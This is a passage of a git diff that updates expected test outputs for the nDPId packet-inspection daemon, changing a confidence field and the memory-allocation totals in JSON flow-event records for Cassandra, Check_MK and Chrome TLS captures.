-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","packets-captured":286,"packets-processed":286,"total-skipped-flows":0,"total-l4-payload-len":107108,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1450889698077} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 286/286 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878797 bytes -~~ total memory freed........: 5878797 bytes -~~ total allocations/frees...: 118404/118404 +~~ total memory allocated....: 6012431 bytes +~~ total memory freed........: 6012431 bytes +~~ total allocations/frees...: 121166/121166 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 693 chars diff --git a/test/results/check_mk_new.pcap.out b/test/results/check_mk_new.pcap.out index 87782a18d..4fba557ff 100644 --- a/test/results/check_mk_new.pcap.out +++ b/test/results/check_mk_new.pcap.out 
@@ -4,8 +4,8 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1512031663734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA8gwhAAEAGbgrAqGQWwKhkMuZ2GZzVcug3AAAAAKACchA4TQAAAgQFtAQCCAorDGs\/AAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1512031663734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"8soKyPpERjIA9qTsCABFAAA8AABAAEAG8SLAqGQywKhkFhmc5nZuqQJN1XLoOKAScSBJyAAAAgQFtAQCCAoWUVydKwxrPwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1512031663734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA0gwlAAEAGbhHAqGQWwKhkMuZ2GZzVcug4bqkCToAQAOVJwAAAAQEICisMaz8WUVyd"} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","packets-captured":98,"packets-processed":98,"total-skipped-flows":0,"total-l4-payload-len":13758,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1512031663775} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 98/98 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872285 bytes -~~ total memory freed........: 5872285 bytes -~~ total allocations/frees...: 118212/118212 +~~ total memory allocated....: 6005919 bytes +~~ total memory freed........: 6005919 bytes +~~ total allocations/frees...: 120974/120974 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 705 chars 
diff --git a/test/results/chrome.pcap.out b/test/results/chrome.pcap.out
index c7c8af996..a485ddfca 100644
--- a/test/results/chrome.pcap.out
+++ b/test/results/chrome.pcap.out
@@ -4,14 +4,14 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620902507870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902507870,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuJAbsdWbUDAAAAALAC\/\/8TEgAAAgQFtAEDAwUBAQgKM3SSOAAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620902507899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902507899,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4lEvFS6HVm1BKAS\/og8HwAAAgQFrAQCCAo6mxVSM3SSOAEDAwc="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620902507899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902507899,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuJAbsdWbUERLxUu4AQECxZJAAAAQEICjN0klQ6mxVS"} 
-00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902508740,"flow_last_seen":1620902508740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902508740,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620902508740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902508740,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuKAbtgbcSnAAAAALAC\/\/+8\/wAAAgQFtAEDAwUBAQgKM3SVkQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620902508769,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902508769,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4peZebaYG3EqKAS\/og23AAAAgQFrAQCCAo6mxi5M3SVkQEDAwc="} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620902508769,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902508769,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuKAbtgbcSoXmXm24AQECxT5gAAAQEICjN0lag6mxi5"} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509272,"flow_last_seen":1620902509272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509272,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620902509272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509272,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuYAbvjd2YSAAAAALAC\/\/+WlQAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509273,"flow_last_seen":1620902509273,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509273,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -28,20 +28,20 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuaAbt39JnGf4gLD4AQECwd3QAAAQEICjN0l5M6mxrM"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509303,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5sh1fPg5uH4xaAS\/oinwwAAAgQFrAQCCAo6mxrPM3SXewEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509303,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvubAbvm4fjFIdXz4YAQECzEywAAAQEICjN0l5Q6mxrP"} 
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 